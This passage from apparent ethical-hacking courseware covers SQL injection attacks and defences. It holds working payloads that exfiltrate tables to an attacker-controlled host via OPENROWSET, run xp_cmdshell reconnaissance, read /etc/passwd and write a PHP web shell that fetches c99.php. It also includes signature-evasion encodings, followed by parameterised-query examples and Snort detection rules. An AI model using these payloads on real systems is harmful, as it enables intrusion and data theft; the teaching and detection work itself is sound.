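The case-insensitive half is the design flaw worth remembering: an attacker pays one SHA-1 per candidate regardless of how the victim capitalised the password, and only expands case for the one word that matches. Later SQL Server versions dropped that second hash for exactly this reason.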
Transferring Data to the Attacker's Machine with OPENROWSET
With OPENROWSET, an injected INSERT can push whole tables to a SQL Server the attacker controls (myIP, listening on port 80 so the outbound connection looks like web traffic). The destination tables (mydatabase..table1 and so on) must already exist on the attacker's server with a matching column layout, and the target's service account needs outbound network access:

'; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..table1') select * from database..table1 --
'; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..table2') select * from database..table2 --

The same technique copies the system catalog, so the schema can be browsed offline instead of one error message at a time:

'; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..hacked_sysdatabases') select * from master.dbo.sysdatabases --
'; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..hacked_sysobjects') select * from user_database.dbo.sysobjects --
'; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.syscolumns --
MySQL OS Interaction
LOAD_FILE:
' union select 1, load_file('/etc/passwd'), 1, 1, 1 --
LOAD DATA INFILE:
create table temp(line blob);
load data infile '/etc/passwd' into table temp;
select * from temp;
SELECT ... INTO OUTFILE writes query results to a file on the server (see the next slide).

MS SQL OS Interaction
'; exec master..xp_cmdshell 'ipconfig > test.txt' --
'; CREATE TABLE tmp (txt varchar(8000)); BULK INSERT tmp FROM 'test.txt' --
'; begin declare @data varchar(8000); set @data='| '; select @data=@data+txt+' | ' from tmp where txt<@data; select @data as x into temp end --
' and 1 in (select substring(x,1,256) from temp) --
'; declare @var sysname; set @var = 'del test.txt'; EXEC master..xp_cmdshell @var; drop table temp; drop table tmp --

Both methods find passwords and execute commands, and both are restricted by the privileges and permissions the database runs with: the mysqld or SQL Server service account must be able to read or write the file, and MySQL additionally requires the FILE privilege for the injected user.
LOAD_FILE() and INTO OUTFILE
The LOAD_FILE() function within MySQL reads and returns the contents of a file located on the MySQL server:
NULL UNION ALL SELECT LOAD_FILE('/etc/passwd') /*
If successful, the injection will display the contents of the password file.

The SELECT ... INTO OUTFILE clause within MySQL is often used to run a query and dump the results into a file. Writing a PHP one-liner into the web root turns it into a web shell:
NULL UNION ALL SELECT NULL,NULL,NULL,NULL,'<?php system($_GET["command"]); ?>' INTO OUTFILE '/var/www/juggyboy.com/shell.php' /*
If successful, it will then be possible to run system commands via the $_GET global. The following is an example of using wget to get a file:
http://www.juggyboy.com/shell.php?command=wget http://www.example.com/c99.php

Both need the FILE privilege, a path the mysqld account can read or write, and a secure_file_priv setting that does not confine file access to another directory; INTO OUTFILE also refuses to overwrite an existing file.
Network Reconnaissance
Network reconnaissance is used to gather all the information about the network and then check for vulnerabilities present in it. You can execute the following through xp_cmdshell: ipconfig /all, tracert myIP, arp -a, nbtstat -c, netstat -ano, route print.

An attacker uses the following techniques to gather IP information through reverse lookups:
Reverse DNS: when web server logs are processed, a reverse lookup is used to determine the names of the machines accessing the server and where the users are from. Making the database host resolve a name against the attacker's own DNS server reveals the host's outbound address in the attacker's DNS logs:
'; exec master..xp_cmdshell 'nslookup a.com MyIP' --
Reverse Pings: code for the reverse ping is:
'; exec master..xp_cmdshell 'ping 10.0.0.75' --
OPENROWSET: OPENROWSET provides a way to use data from a different server in a SQL Server statement. It is also helpful for connecting to a data source directly through OLE DB without creating a linked server, and the outbound connection it makes reveals the host's address to the attacker's listener:
'; select * from OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=10.0.0.75,80;', 'select * from table') --

(Diagram: Attacker -> OS Shell -> Local Network.)
The complete reconnaissance sequence runs every command in one xp_cmdshell call, appending the output to a file, loads the file into a table and reads it back through an error message:

'; declare @var varchar(256); set @var = ' del test.txt && arp -a >> test.txt && ipconfig /all >> test.txt && nbtstat -c >> test.txt && netstat -ano >> test.txt && route print >> test.txt && tracert -w 10 -h 10 google.com >> test.txt'; EXEC master..xp_cmdshell @var --
'; CREATE TABLE tmp (txt varchar(8000)); BULK INSERT tmp FROM 'test.txt' --
'; begin declare @data varchar(8000); set @data=': '; select @data=@data+txt+' | ' from tmp where txt<@data; select @data as x into temp end --
' and 1 in (select substring(x,1,255) from temp) --
'; declare @var sysname; set @var = 'del test.txt'; EXEC master..xp_cmdshell @var; drop table temp; drop table tmp --

Note: Microsoft has disabled xp_cmdshell by default in SQL Server 2005/2008. To enable this feature you need sysadmin rights, and 'show advanced options' must be switched on before the xp_cmdshell option becomes visible:
EXEC sp_configure 'show advanced options', 1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', 1
GO
RECONFIGURE
Module Flow
SQL Injection Tools -> Evasion Techniques -> Countermeasures
Attackers can also make use of tools to perform SQL injection attacks. These tools help attackers carry out various types of SQL injection attacks and make the attacker's job easy.
SQL Injection Tool: BSQL Hacker
BSQL (Blind SQL) Hacker is an automated SQL injection framework/tool designed to exploit SQL injection vulnerabilities in virtually any database. The version shown is BSQL Hacker v0.9.0.9 ("Beta but Getting There!"). Its features include:
Time-based blind SQL injection
Deep blind (based on advanced time delays) SQL injection
Error-based SQL injection
Can automate most of the new SQL injection methods that rely on blind SQL injection
RegEx signature support
Console and GUI support
Load/save support
Token/Nonce/ViewState etc. support
Session-sharing support
Advanced configuration support
Automated attack mode, which automatically extracts the whole database schema and data
(Screenshots: the main window with Templates, Injection, Import, Start/Stop, Edit, Exploits and Help menus, the Injection Wizard, the Detection and Request & Injection panes, the request history, and the application log reporting "Attack Successfully Finished!".)
SQL Injection Tool: Marathon Tool
Source: http://marathontool.codeplex.com
Using Marathon Tool, a malicious user can send heavy queries to perform a time-based blind SQL injection attack. Its features include:
Data extraction from Microsoft Access 97/2000/2003/2007 databases
Parameter injection using HTTP GET or POST
SSL support
HTTP proxy connection available
Authentication methods: Anonymous, Basic, Digest, and NTLM
Variable and value insertion in cookies (does not support dynamic values)
Configuration available and flexible for injections
(Screenshot: the Configuration tab, with Database engine and Target base URL, GET/POST and SSL options, and injection options such as minimum heavy-query time, HTTP request timeout, pause after a heavy query and after any query, repeat-tests count, and minimum and maximum joins for queries.)
SQL Injection Tool: SQL Power Injector
Source: http://www.sqlpowerinjector.com
SQL Power Injector is an application created in .NET 1.1 that helps the penetration tester find and exploit SQL injections on a web page.
(Screenshot: the main window with the cookie and parameter panes and a list of blind-injection test requests that binary-search a value with comparisons of the form p=250>(SELECT LEN(...)), p=125>..., and so on, each marked "Is true".)
SQL Injection Tools: Havij
Source: http://www.itsecteam.com
Havij is an automated SQL injection tool that helps attackers find and exploit SQL injection vulnerabilities on a web page. With the help of this tool, an attacker can fingerprint the back-end database, retrieve DBMS users and password hashes, dump tables and columns, fetch data from the database, run SQL statements, and even access the underlying file system and execute commands on the operating system.
(Screenshot: the Havij main window with a target URL ending in ?id=123, the Find Admin tab, HTTP header and authentication settings, and the status line reading IDLE.)
SQL Injection Tools
There are some more SQL injection tools that attackers can use to perform SQL injection attacks. These include:
SQL Brute: http://www.gdssecurity.com
BobCat: http://www.northern-monkee.co.uk
Sqlninja: http://sqlninja.sourceforge.net
sqlget: http://www.darknet.org.uk
Absinthe: http://www.darknet.org.uk
Blind Sql Injection Brute Forcer: http://code.google.com
sqlmap: http://sqlmap.org
SQL Injection Digger: http://sqid.rubyforge.org
Pangolin: http://nosec.org
SQLPAT: http://www.cqure.net

SQL Injection Tools (Cont'd)
In addition to the previously mentioned tools, a few more SQL injection tools are readily available and are listed as follows:
FJ-Injector Framework: http://sourceforge.net
Exploiter (beta): http://www.ibm.com
SQLIer: http://bcable.net
Sqlsus: http://sqlsus.sourceforge.net
SQLEXEC() Function: http://msdn.microsoft.com
SqlInjector: http://www.woanware.co.uk
Automagic SQL Injector: http://www.securiteam.com
SQL Inject-Me: http://labs.securitycompass.com
NTO SQL Invader: http://www.ntobjectives.com
The Mole: http://themole.nasel.com.ar
M o d u le F lo w
Evasion techniques are the techniques adopted by the attacker for modifying the attack payload in such a way that they cannot be detected by firewalls. Simple evasion techniques include hex encoding, manipulating white spaces, in-line comments, manipulating white spaces, sophisticated matches, char encoding, and hex coding and they are discussed in detail on the following slides.
|j|||r
Evasion Techniques
!/
V
Countermeasures
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Evading IDSs
Attackers use evasion techniques to obscure input strings in order to avoid detection by signature-based detection systems. Signature-based detection systems build a database of SQL injection attack strings (signatures) and then compare input strings against the signature database at runtime to detect attacks. If any input matches an attack signature present in the database, the system immediately raises an alarm. The problem is most acute for network-based IDSs (NIDSs) that rely on signatures: they see the raw request and must match it before the web application and database have decoded it. Attackers therefore craft input that fails every signature yet still reaches the database as a valid statement.
(Diagram: Attacker -> Internet -> Firewall -> IDS Filters -> Web Application -> Database. The web application returns actual data, the IDS filters alert the Security Admin, and the attacker's goal is an OS shell on the network.)
lE ?
In-line C o m m e n t
O b scures input strings by inserting in-line co m m e n ts b e tw e e n S Q L keyw o rds
Hex Encoding
Uses h ex adecim al en co din g to re p rese n t a SQ L q u e ry string
C har Encoding
U ses built-in CH A R fu n ctio n to re p rese n t a c h a ra c te r
O bfuscated Codes
O b fuscated co d e is an SQ L sta te m e n t th a t has b een m a d e difficult to u nd erstan d
T y p e s of S ig n a tu re E v a sio n T e c h n iq u e s
The following are the various types of signature evasion techniques:
Sophisticated Matches: Uses alternative expressions of "OR 1=1".
Hex Coding: Uses hexadecimal encoding to represent a SQL query string.
Manipulating White Spaces: White space diversity is one of the signatures used to prevent SQL injection attacks. In this, a sequence of two or more expressions is separated by white space for a simple reason: a single word such as SELECT may generate a lot of false positives, whereas the expression UNION SELECT may make a good signature. If the signature isn't built properly, the signature is of no use and is highly prone to attacks.
In-line Comment: Obscures input strings by inserting in-line comments between SQL keywords.
Char Encoding: Uses the built-in CHAR function to represent a character.
String Concatenation: Concatenates text to create a SQL keyword using DB-specific instructions.
Obfuscated Codes: Obfuscated code is a SQL statement that has been made difficult to understand.
MS SQL Server syntax shown on the slide:
?Param1=foo&Param2=bar  URL parameters
@variable  local variable
@@variable  global variable
waitfor delay '0:0:10'  time delay
An IDS signature may be looking for the string ' OR 1=1. Replacing this string with another string will have the same effect.
Evasion Technique: Sophisticated Matches
Attackers use the sophisticated matches evasion technique to trick and bypass user authentication. It uses an alternative expression of "OR 1=1". The attacker first uses the OR 1=1 attack in the form ' OR 'john'='john'. If this doesn't work, the attacker tricks the system by adding N to the second string: ' OR 'movies'=N'movies'. This method is very useful in signature evasion for evading advanced systems.
Further slide entries:
/* ... */  multiple-line comment
PRINT  useful as a non-transactional command
Evading the ' OR 1=1 signature:
' OR 'john'='john'
' OR 'microsoft'='micro'+'soft'
' OR 'movies'=N'movies'
'% OR 'software' like 'soft'
OR 7 < 1
OR 'best' > 'b'
' OR 'whatever' IN ('whatever')
OR 5 BETWEEN 1 AND
For example, the string 'SELECT' can be represented by the hexadecimal number 0x73656c656374.
DROP Table CreditCard = 0x44524f50205461626C652043726564697443617264
INSERT into USERS ('Juggyboy', 'qwerty') = 0x494e5345525420696e746f2055534552532028274a75676779426f79272c20277177657274792729
Evasion Technique: Hex Encoding
Hex encoding is used to represent characters in URLs. Some URLs contain %20; that is a hex encoding. %20 is used as a single space, as a URL cannot contain an actual space. Most alphanumeric characters also have hex encodings. Many intrusion detection systems (IDSs) don't recognize hex encodings, and attackers take advantage of this. Hex coding gives attackers countless ways to obfuscate each URL. The hex encoding evasion technique uses hexadecimal encoding to represent a string. For example, the string 'SELECT' can be represented by the hexadecimal number 0x73656c656374, which most likely will not be detected by a signature-based protection mechanism.
This statement uses no single quotes (').
The white space manipulation technique obfuscates input strings by dropping or adding white space between SQL keywords and string or number literals without altering the execution of the SQL statement.
Adding white space using special characters like tab, carriage return, or line feed makes an SQL statement very hard to match against a signature without changing its execution: the signature "UNION SELECT" is different from "UNION<tab>SELECT".
Dropping spaces from SQL statements will not affect their execution by some SQL databases (e.g. the OR comparison written with no spaces around it).
Evade signatures that filter white spaces. In this technique, white spaces between SQL keywords are replaced by inserting in-line comments. /* ... */ is used in SQL to delimit multirow comments.
UNION/**/SELECT/**/'/**/OR/**/1/**/=/**/1
This allows the injection commands to be spread through multiple fields:
USERNAME: or 1/*
PASSWORD: */=1
Evasion Technique: In-line Comment
Evade signatures that filter white spaces. In this technique, white spaces between SQL keywords are replaced by inserting in-line comments. /* ... */ is used in SQL to delimit multirow comments:
UNION/**/SELECT/**/'/**/OR/**/1/**/=/**/1
Evasion Technique: Char Encoding
To evade IDSs/IPSs, attackers use the CHAR() function to build the characters of their injected SQL statements, so that the literal strings a signature looks for never appear in the input.
Slide examples (only partly recoverable from the scan): a UNION SELECT ... FROM users WHERE login = char(114,111,111,116) query, in which the string 'root' is built with CHAR, and a load_file(char(...)) call whose result is compared with char(39,39) inside a 1=( ..., 1, 0) condition.
Slide examples (reconstructed from the scanned fragments):
Oracle: '; execute immediate 'sel'||'ect us'||'er'
MS SQL: '; exec ('sel'+'ect us'+'er')
MS SQL: '; exec ('dro'+'p t'+'ab'+'le')
MySQL: '; execute concat('inse','rt us','er')
Evasion Technique: String Concatenation
The SQL engine builds a single string from multiple pieces, so the attacker uses concatenation to break up identifiable keywords and evade intrusion detection systems. Concatenation syntax varies from database to database. The instructions are split to avoid signature detection by using execution commands that allow text to be concatenated on the database server.
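Added example, not code from the module: a small normaliser that undoes the statically decodable evasion forms described in the hex encoding, char encoding, white space, in-line comment and string concatenation sections above, then runs a few constructed signatures over both the raw and the normalised input so the gap that evasion exploits is visible. The signatures, sample inputs and function names are assumptions made here.

```python
import re

# Evasion forms this normaliser undoes before signatures are checked:
#   /* ... */ in-line comments      -> a single space
#   0x73656c656374 hex literals     -> the quoted text they encode ('select')
#   char(114,111,111,116) calls     -> the quoted text they spell ('root')
#   'sel'+'ect', 'sel'||'ect',
#   concat('sel','ect')             -> one folded literal ('select')
#   tabs / CR / LF / space runs     -> a single space
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
HEX_LITERAL = re.compile(r"\b0x(?:[0-9a-fA-F]{2})+\b")
CHAR_CALL = re.compile(r"\bchar\s*\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", re.IGNORECASE)
CONCAT_OP = re.compile(r"'([^']*)'\s*(?:\+|\|\|)\s*'([^']*)'")
CONCAT_FN = re.compile(r"\bconcat\s*\(\s*'([^']*)'\s*,\s*'([^']*)'\s*\)", re.IGNORECASE)

# Constructed signatures of the kind a naive matcher holds: (regex, name).
SIGNATURES = [
    (re.compile(r"union\s+select", re.IGNORECASE), "union-select"),
    (re.compile(r"drop\s+table", re.IGNORECASE), "drop-table"),
    (re.compile(r"'\s*or\s+1\s*=\s*1", re.IGNORECASE), "or-1=1"),
    (re.compile(r"select\s+user", re.IGNORECASE), "select-user"),
    (re.compile(r"login\s*=\s*'root'", re.IGNORECASE), "login-root"),
]


def _hex_to_literal(m):
    """0x.. -> 'text'; left untouched when the bytes are not printable ASCII."""
    try:
        text = bytes.fromhex(m.group(0)[2:]).decode("ascii")
    except UnicodeDecodeError:
        return m.group(0)
    return "'" + text + "'" if text.isprintable() else m.group(0)


def _char_to_literal(m):
    """char(n, n, ...) -> 'text' for printable ASCII code points only."""
    codes = [int(c) for c in m.group(1).split(",")]
    if any(c < 32 or c > 126 for c in codes):
        return m.group(0)
    return "'" + "".join(chr(c) for c in codes) + "'"


def _fold(m):
    return "'" + m.group(1) + m.group(2) + "'"


def normalize(s):
    """Return the canonical, lower-cased form of an input string."""
    s = INLINE_COMMENT.sub(" ", s)
    s = HEX_LITERAL.sub(_hex_to_literal, s)
    s = CHAR_CALL.sub(_char_to_literal, s)
    prev = None
    while prev != s:  # 'a'+'b'+'c' folds one pair per pass
        prev = s
        s = CONCAT_OP.sub(_fold, s)
        s = CONCAT_FN.sub(_fold, s)
    s = re.sub(r"\s+", " ", s)
    return s.strip().lower()


def match_signatures(s):
    """Names of SIGNATURES that match s, in list order."""
    return [name for rx, name in SIGNATURES if rx.search(s)]


# Constructed inputs in the forms the module describes (not captured traffic).
# The tab/CR/LF sample shows that regex signatures written with \s already
# tolerate white-space padding; only fixed-string signatures are fooled by it.
SAMPLES = [
    "UNION/**/SELECT/**/'/**/OR/**/1/**/=/**/1",                        # in-line comment
    "UNION\tSELECT\r\n'\tOR\t1=1",                                      # white space
    "' union select * from users where login = char(114,111,111,116)",  # CHAR()
    "'; exec(0x44524f50205461626C652043726564697443617264)",           # hex literal
    "'; execute immediate 'sel'||'ect us'||'er'",                       # Oracle concat
    "'; exec ('sel'+'ect us'+'er')",                                    # MS SQL concat
]


def report(samples=SAMPLES):
    """(raw hits, normalised hits) per sample: the gap is what evasion buys."""
    return [(match_signatures(s), match_signatures(normalize(s))) for s in samples]


if __name__ == "__main__":
    for s, (before, after) in zip(SAMPLES, report()):
        print(repr(s))
        print("   raw:", before or "-", "| normalised:", after or "-")
```

The obfuscated-function forms shown later (Reverse(concat(...)), unhex(crc32(...))) cannot be undone this way; they need the database's own evaluation, which is why the countermeasures section relies on parameterisation rather than pattern matching.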
Obfuscated "qwerty"
Examples of obfuscated code for the string "qwerty":
Reverse(concat(if(1, char(121), 2), 0x74, right(left(0x567210, 2), 1), lower(mid('TEST', 2, 1)), replace(0x7074, 'pt', 'w'), char(instr(123321, 33)+110)))
Concat(unhex(left(crc32(31337), 3)-400), unhex(ceil(atan(1)*100-2)), unhex(round(log(2)*100)-4), char(114), char(right(cot(31337), 2)+54), char(pow(11, 2)))
Evasion Technique: Obfuscated Codes
Attackers obfuscate code so that it is not recognized by the intrusion detection system.
Module Flow
So far, we have discussed various concepts and topics that help you penetrate the web application or network to test for SQL vulnerabilities. Now we will discuss the countermeasures to be applied to protect web applications against SQL injection attacks. A countermeasure is an act, method, device, or system that can be used to avoid the side effects of vulnerabilities and malicious events that can in turn compromise the assets of an organization or of a computer in a network. It can be a response that defends against the negative event.
Evasion Techniques
Countermeasures
Figure labels: Monitor DB traffic using an IDS, WAF; Database server runs OS commands; Use low privileged account for DB connection; Error message revealing important information; Suppress all error messages; Filter all client data.
How to Defend Against SQL Injection Attacks
Implementing consistent coding standards, minimizing privileges, and firewalling the
Minimizing Privileges
Developers generally neglect security aspects while creating a new application, and tend to leave those matters to the end of the development cycle. However, security matters should be a priority, and adequate steps must be incorporated during the development stage itself. It is important to create a low-privilege account first, and begin to add permissions only as they are needed. The benefit to addressing security early is that it allows developers to address security concerns as features are added, so they can be identified and fixed easily. In addition, developers become much more familiar with the security framework, if they are forced to comply with it throughout the project's lifetime. The payoff is usually a more secure product that does not require the last minute security scramble that inevitably occurs when customers complain that their security policies do not allow applications to run outside of the system administrator's context.
a product should be carried out. Apart from this, a set of standards and policies with which every developer must comply should be laid down. Take, for example, a policy for performing data access. Developers are generally allowed to use whatever data access method they like. This usually results in a multitude of data access methods, each exhibiting unique security concerns. A more prudent policy would be to dictate certain guidelines that guarantee similarity in each developer's routines. This consistency would greatly enhance both the maintainability and security of the product, provided the policy is sound. Another useful coding policy is to ensure that all input validation checks are performed on the server. Although it is sometimes a performance technique to carry out data entry validation on the client, since it minimizes round-trips to the server, it should not be assumed that the user is actually conforming to that validation when they post information. In the end, all input validation checks should occur on the server.
most web environments, the only hosts that need to connect to SQL Server are the administrative network (if there is one) and the web server(s) that it services. Typically, SQL Server itself needs to connect only to a backup server. SQL Server 2000 listens by default on named pipes (using Microsoft networking on TCP ports 139 and 445) as well as TCP port 1433 and UDP port 1434 (the port used by the "SQL Slammer" worm). If the server lockdown is good enough, it should help mitigate the risk of the following:
Developers uploading unauthorized/insecure scripts and components to the web server
Misapplied patches
Administrative errors
Test the size and data type of input and enforce appropriate limits to prevent buffer overruns
Test the content of string variables and accept only expected values
Reject entries that contain binary data, escape sequences, and comment characters
Never build Transact-SQL statements directly from user input and use stored procedures to validate user input
Implement multiple layers of validation and never concatenate user input that is not validated
How to Defend Against SQL Injection Attacks (Contd)
Attackers use SQL injection to gain unauthorized access to the system or network. The following things should be done to defend against SQL injection attacks:
Make no assumptions about the size, type, or content of the data that is received by your application.
Test the size and data type of input and enforce appropriate limits to prevent buffer overruns.
Test the content of string variables and accept only expected values.
Reject entries that contain binary data, escape sequences, and comment characters.
Never build Transact-SQL statements directly from user input and use stored procedures to validate user input.
Implement multiple layers of validation and never concatenate user input that is not validated.
Enforce type and length checks using a Parameter Collection so that input is treated as a literal value instead of executable code:

    SqlDataAdapter myCommand = new SqlDataAdapter("AuthLogin", conn);
    myCommand.SelectCommand.CommandType = CommandType.StoredProcedure;
    SqlParameter parm = myCommand.SelectCommand.Parameters.Add("@aut_id", SqlDbType.VarChar, 11);
    parm.Value = Login.Text;

In this example, the @aut_id parameter is treated as a literal value instead of as executable code. This value is checked for type and length.

Vulnerable Code:

    SqlDataAdapter myCommand = new SqlDataAdapter("LoginStoredProcedure '" + Login.Text + "'", conn);

Secure Code:

    SqlDataAdapter myCommand = new SqlDataAdapter("SELECT aut_lname, aut_fname FROM Authors WHERE aut_id = @aut_id", conn);
    SqlParameter parm = myCommand.SelectCommand.Parameters.Add("@aut_id", SqlDbType.VarChar, 11);
    parm.Value = Login.Text;

Use type-safe SQL parameters with stored procedures or dynamically constructed SQL command strings. Various parameter collections provide type checking and length validation. For example, a SQL parameter collection can be used, and type and length checks can be enforced through it. In the example above, the input "@aut_id" is treated as a literal value instead of executable code, and the @aut_id value is checked for type and length. Of the vulnerable and secure code examples, the first builds the command text from Login.Text and is vulnerable to SQL injection; the second passes Login.Text only as a parameter value.
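The same vulnerable/secure contrast as an added, runnable example in Python with sqlite3 (not the module's C# code). The Authors rows, the eleven-character limit standing in for SqlDbType.VarChar, 11, and the function names are constructed assumptions.

```python
import sqlite3


def make_db():
    """In-memory Authors table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Authors (aut_id TEXT, aut_lname TEXT, aut_fname TEXT)")
    conn.executemany(
        "INSERT INTO Authors VALUES (?, ?, ?)",
        [("172-32-1176", "White", "Johnson"), ("213-46-8915", "Green", "Marjorie")],
    )
    return conn


def lookup_vulnerable(conn, login_text):
    """String-built statement, like the module's vulnerable code: the input
    becomes part of the SQL text, so a quote in it rewrites the WHERE clause."""
    sql = "SELECT aut_lname, aut_fname FROM Authors WHERE aut_id = '" + login_text + "'"
    return conn.execute(sql).fetchall()


def lookup_secure(conn, login_text):
    """Type and length check first (the VarChar(11) of the C# example), then
    the value is bound as a parameter, so the engine only ever compares it and
    never parses it.  Returns None when the input fails the check."""
    if not isinstance(login_text, str) or len(login_text) > 11:
        return None
    sql = "SELECT aut_lname, aut_fname FROM Authors WHERE aut_id = ?"
    return conn.execute(sql, (login_text,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # A real id, an 11-character tautology that passes the length check, and
    # the module's ' OR 'john'='john form, which fails it.
    for text in ["172-32-1176", "' OR 'a'='a", "' OR 'john'='john"]:
        print(repr(text))
        print("   vulnerable ->", lookup_vulnerable(db, text))
        print("   secure     ->", lookup_secure(db, text))
```

The tautology returns every row from the string-built query but no rows from the bound query, which is the whole difference between the two C# snippets above.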
How to Defend Against SQL Injection Attacks
To defend against SQL injection attacks, you can follow the countermeasures stated in the previous section and you can use type-safe SQL parameters as well. To protect the web server, use a WAF and IDS and filter packets. Constantly update the software with patches to keep the server up-to-date and protect it from attackers. Sanitize and filter user input, analyze the source code for SQL injection, and minimize the use of third-party applications to protect the web applications. You can also use stored procedures and parameterized queries to retrieve data, disable verbose error messages, which can give the attacker useful information, and use custom error pages to protect the web applications. To limit what SQL injection can do inside the database, connect using non-privileged accounts and grant least privileges on the database, tables, and columns. Disable commands such as xp_cmdshell, which can affect the OS of the system.
FIGURE 14.28: How to Defend Against SQL Injection Attack. Figure elements: Attacker, Internet, Log in Form, Web Server, Web Application, DBMS, Operating System, SQL Query, Custom Error Page. Callouts: Use WAF Firewall/IDS and filter packets; Connect to the Database using non-privileged account; Grant least privileges to the database, tables, and columns; Minimize use of 3rd party apps.
SQL Injection Detection Tool: Microsoft Source Code Analyzer
Source: http://www.microsoft.com The Microsoft Source Code Analyzer for SQL Injection tool is a static code analysis tool that helps you find SQL injection vulnerabilities in Active Server Pages (ASP) code. It scans ASP source code and generates warnings related to first order and second order SQL injection vulnerabilities.
SQL Injection Detection Tool: Microsoft UrlScan Filter
Source: http://www.microsoft.com UrlScan is a security tool that restricts the types of HTTP requests that Internet Information Services (IIS) will process. By blocking specific HTTP requests, the UrlScan security tool helps prevent potentially harmful requests from reaching the server.
SQL Injection Detection Tool: dotDefender
Source: http://www.applicure.com dotDefender is a software Web Application Firewall (WAF). dotDefender boasts enterprise-class security and advanced integration capabilities. It inspects HTTP/HTTPS traffic for suspicious behavior, and detects and blocks SQL injection attacks.
FIGURE 14.31: dotDefender Screenshot. The console is shown at Default Security Profile (Protection) > Patterns > SQL Injection > Best Practices, with the prompt "Choose which type of SQL Injection attacks to intercept" and these patterns enabled: Classic SQL Comment, Union Select Statement, Select Version Statement, SQL CHAR Type, SQL SYS Commands, IS_SRVROLEMEMBER followed by (, MS SQL Specific SQL Injection.
SQL Injection Detection Tool: IBM Security AppScan
Source: http://www.ibm.com IBM Security AppScan Standard detects, analyzes, and remediates web application vulnerabilities to help prevent security breaches and enable compliance. It delivers the expertise and critical application lifecycle management and security platform integrations necessary to empower enterprises to not just identify application vulnerabilities but also reduce overall application risk.
SQL Injection Detection Tool: WebCruiser
Source: http://sec4app.com
WebCruiser is a web vulnerability scanner that allows you to scan any website for web vulnerabilities such as SQL injection, cross-site scripting, XPath injection, etc. Features:
Vulnerability Scanner: SQL injection, cross-site scripting, XPath injection, etc.
SQL Injection Scanner
SQL Injection Tool: GET/POST/Cookie injection POC (proof of concept)
SQL injection for SQL Server, MySQL, DB2, Oracle, etc.
Snort Rule to Detect SQL Injection Attacks
Source: http://www.snort.org Snort rules are very useful in detecting SQL injection. Apart from detecting SQL injection attacks, Snort also sends an alert or logs the intrusion attempt. Snort uses signature-, protocol-, and anomaly-based detection methods. Block these expressions in Snort:

/(\%27)|(\')|(\-\-)|(\%23)|(#)/ix
/exec(\s|\+)+(s|x)p\w+/ix
/((\%27)|(\'))union/ix
/\w*((\%27)|(\'))((\%6F)|o|(\%4F))((\%72)|r|(\%52))/ix

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL Injection Paranoid"; flow:to_server,established; uricontent:".pl"; pcre:"/(\%27)|(\')|(\-\-)|(%23)|(#)/i"; classtype:Web-application-attack; sid:9099; rev:5;)
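An added example, not from the Snort project or the module, that runs the four slide expressions over constructed access-log lines and reports which one fires for each request, including a request with a legitimate apostrophe and the hex-encoded and in-line-comment forms from the evasion section. The log lines, pattern names and helper functions are assumptions made here.

```python
import re
from urllib.parse import unquote

# The four expressions from the slide, in the order listed there.  The "x"
# (extended) flag is dropped: under it an unescaped "#" starts a comment in
# both PCRE and Python's re.VERBOSE, which would break the first pattern.
PATTERNS = [
    ("sql-meta-chars", re.compile(r"(\%27)|(\')|(\-\-)|(\%23)|(#)", re.IGNORECASE)),
    ("mssql-exec-sp-xp", re.compile(r"exec(\s|\+)+(s|x)p\w+", re.IGNORECASE)),
    ("quote-union", re.compile(r"((\%27)|(\'))union", re.IGNORECASE)),
    ("quote-or", re.compile(r"\w*((\%27)|(\'))((\%6F)|o|(\%4F))((\%72)|r|(\%52))",
                            re.IGNORECASE)),
]

REQUEST_LINE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def classify(uri):
    """Names of the slide patterns that match the URI.  Each pattern is tried
    on the URI as sent and on its percent-decoded form, which is what Snort's
    HTTP preprocessor hands to pcre (so exec%20xp_... still counts)."""
    decoded = unquote(uri)
    return [name for name, rx in PATTERNS if rx.search(uri) or rx.search(decoded)]


def scan_log(text):
    """(uri, hits) for every request line in an access log."""
    out = []
    for line in text.splitlines():
        m = REQUEST_LINE.search(line)
        if m:
            out.append((m.group(1), classify(m.group(1))))
    return out


# Constructed access-log lines, not real traffic.  The hex-literal request
# reuses the DROP Table CreditCard encoding from the hex-encoding slide.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jun/2012:10:00:01 +0000] "GET /login.asp?id=1%27or%201=1 HTTP/1.1" 200 512
10.0.0.5 - - [12/Jun/2012:10:00:02 +0000] "GET /page.asp?id=1;exec%20xp_cmdshell HTTP/1.1" 500 120
10.0.0.5 - - [12/Jun/2012:10:00:03 +0000] "GET /page.asp?id=1'union+select+1,2 HTTP/1.1" 500 120
10.0.0.5 - - [12/Jun/2012:10:00:04 +0000] "GET /page.asp?id=1'/**/union/**/select/**/1,2 HTTP/1.1" 500 120
10.0.0.5 - - [12/Jun/2012:10:00:05 +0000] "GET /page.asp?id=1;exec(0x44524f50205461626C652043726564697443617264) HTTP/1.1" 200 512
10.0.0.9 - - [12/Jun/2012:10:00:06 +0000] "GET /search.asp?q=O'Brien HTTP/1.1" 200 2048
10.0.0.9 - - [12/Jun/2012:10:00:07 +0000] "GET /news.asp?id=5 HTTP/1.1" 200 2048
"""

if __name__ == "__main__":
    for uri, hits in scan_log(SAMPLE_LOG):
        print(f"{uri:72} {', '.join(hits) or '-'}")
```

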